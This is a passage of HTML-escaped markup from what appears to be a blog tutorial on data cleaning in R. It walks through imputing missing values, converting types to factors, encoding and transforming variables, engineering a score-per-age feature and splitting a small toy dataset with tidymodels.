&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_smooth&lt;/span&gt;(method &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;lm&amp;#34;&lt;/span&gt;, se &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Scatter Plot of Age vs. Score&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Age&amp;#34;&lt;/span&gt;, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Score&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/best-practices-data-cleaning-r/plot.png" alt="Scatter plot of age vs score. Line of best fit runs through the points, and an outlier can be seen at age 28. score 40." style="width: 600px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;We see that there is one potential outlier. Typically, Score increases
with Age, but Jenny’s score is very low, given her age.&lt;/p&gt;
&lt;h3 id="handling-missing-data"&gt;Handling Missing Data:&lt;/h3&gt;
&lt;p&gt;Missing data is a common challenge in real-world datasets. Ignoring
missing values or handling them poorly can lead to skewed conclusions.
Some methods of handling missing data are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Deletion:&lt;/strong&gt; Remove rows or columns with missing values. This should
only be done when the “missing-ness” is not related to the outcome of
interest.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Imputation:&lt;/strong&gt; Replace missing values with statistical measures such
as the mean, median, or mode.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Advanced Techniques:&lt;/strong&gt; Machine learning-based imputation methods,
like K-nearest neighbors (KNN) or regression imputation, can be used
for more accurate filling of missing values. This is the gold standard
for imputation methods, and is most likely to reduce the bias in our
models and findings.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Below are some common techniques for handling missing data. Here,
missing data is addressed using mean and median imputation, replacing
gaps in ‘age’, ‘score’, and ‘gender’ columns with appropriate measures.
Subsequently, categorical variables are converted to factors and
integers to ensure accurate analysis. The code also showcases advanced
transformations such as encoding categorical variables as binary
features and performing data splitting for machine learning models.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; df &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(age &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;replace_na&lt;/span&gt;(age, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(age, na.rm &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; score &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;replace_na&lt;/span&gt;(score, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;median&lt;/span&gt;(score, na.rm &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; gender &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;replace_na&lt;/span&gt;(gender, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Unknown&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 7 × 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## id name age gender score&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 1 Alice 25 Female 80 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 2 Bob 31 Male 91 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 3 Amber 23.8 Unknown 87 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 4 Fred 23 Male 77 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 5 Eve 23.8 Female 78.5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 6 Jenny 29 Female 40 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 7 Dave 11 Male 70&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Let’s explore some data cleaning and processing steps using the
{tidyverse} package. The {tidyverse} package is an umbrella package; it
imports useful packages for us. The ones we rely on below are
&lt;a href="https://dplyr.tidyverse.org/" rel="external"&gt;{dplyr}&lt;/a&gt; and
&lt;a href="https://tidyr.tidyverse.org/" rel="external"&gt;{tidyr}&lt;/a&gt;. Now let’s begin:&lt;/p&gt;
&lt;p&gt;When working with data in R, it’s important to ensure that the data is
in the right format for analysis and visualisation. Factors are data
types in R that are used to represent categorical variables. Let’s
convert the &lt;code&gt;gender&lt;/code&gt; column to a factor and the &lt;code&gt;age&lt;/code&gt; column to an
integer. By converting the &lt;code&gt;gender&lt;/code&gt; column to a factor, we’re telling R
that the variable is categorical and has a limited set of possible
values. Factors also help ensure that the data is treated correctly in
statistical analyses and modeling.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; df &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(gender &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.factor&lt;/span&gt;(gender),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; age &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.integer&lt;/span&gt;(age))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 7 × 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## id name age gender score&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;int&amp;gt; &amp;lt;fct&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 1 Alice 25 Female 80 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 2 Bob 31 Male 91 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 3 Amber 23 Unknown 87 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 4 Fred 23 Male 77 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 5 Eve 23 Female 78.5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 6 Jenny 29 Female 40 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 7 Dave 11 Male 70&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ol start="3"&gt;
&lt;li&gt;Encoding Categorical Variables&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Many models don’t work with factors (categorical variables) straight out
of the box. A simple workaround is to convert factors to a series of
binary variables:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df_encoded &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; df &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(is_female &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.numeric&lt;/span&gt;(gender &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Female&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df_encoded
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 7 × 6&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## id name age gender score is_female&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;int&amp;gt; &amp;lt;fct&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 1 Alice 25 Female 80 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 2 Bob 31 Male 91 0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 3 Amber 23 Unknown 87 0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 4 Fred 23 Male 77 0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 5 Eve 23 Female 78.5 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 6 Jenny 29 Female 40 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 7 Dave 11 Male 70 0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ol start="4"&gt;
&lt;li&gt;Data Transformation&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Sometimes our models work better with transformed data. For example, if
the distribution of a feature is highly skewed, a log or square root
transform can improve the symmetry of its distribution:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Apply square root transformation to age&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df_encoded &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; df_encoded &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(sqrt_age &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sqrt&lt;/span&gt;(age))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df_encoded
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 7 × 7&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## id name age gender score is_female sqrt_age&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;int&amp;gt; &amp;lt;fct&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 1 Alice 25 Female 80 1 5 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 2 Bob 31 Male 91 0 5.57&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 3 Amber 23 Unknown 87 0 4.80&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 4 Fred 23 Male 77 0 4.80&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 5 Eve 23 Female 78.5 1 4.80&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 6 Jenny 29 Female 40 1 5.39&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 7 Dave 11 Male 70 0 3.32&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ol start="5"&gt;
&lt;li&gt;Feature Engineering&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Feature engineering is just making new columns from old ones. For
example, score per age could be found as:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Create new feature: score_per_age&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df_encoded &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; df_encoded &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(score_per_age &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; score &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; age)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df_encoded
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 7 × 8&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## id name age gender score is_female sqrt_age score_per_age&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;int&amp;gt; &amp;lt;fct&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 1 Alice 25 Female 80 1 5 3.2 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 2 Bob 31 Male 91 0 5.57 2.94&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 3 Amber 23 Unknown 87 0 4.80 3.78&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 4 Fred 23 Male 77 0 4.80 3.35&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 5 Eve 23 Female 78.5 1 4.80 3.41&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 6 Jenny 29 Female 40 1 5.39 1.38&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 7 Dave 11 Male 70 0 3.32 6.36&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ol start="6"&gt;
&lt;li&gt;Data Splitting&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;This is an essential step for many machine learning models; we split the
data into a training set to train the model on, and a test set to allow
us to test model predictions. The tidymodels package offers a consistent
and streamlined approach to data splitting and other aspects of modeling
workflows, making it a powerful tool for data scientists.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Install and load the tidymodels package&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidymodels&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(tidymodels)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Create a split index using initial_split&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;split_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;initial_split&lt;/span&gt;(df_encoded, prop &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.5&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;split_data
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;Training/Testing/Total&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;3/4/7&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Extract the training and testing data sets&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;train_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;training&lt;/span&gt;(split_data)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;test_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;testing&lt;/span&gt;(split_data)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;train_data
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 3 × 8&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## id name age gender score is_female sqrt_age score_per_age&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;int&amp;gt; &amp;lt;fct&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 6 Jenny 29 Female 40 1 5.39 1.38&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 5 Eve 23 Female 78.5 1 4.80 3.41&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 7 Dave 11 Male 70 0 3.32 6.36&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;test_data
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 4 × 8&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## id name age gender score is_female sqrt_age score_per_age&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;int&amp;gt; &amp;lt;fct&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 1 Alice 25 Female 80 1 5 3.2 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 2 Bob 31 Male 91 0 5.57 2.94&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 3 Amber 23 Unknown 87 0 4.80 3.78&lt;/span&gt;
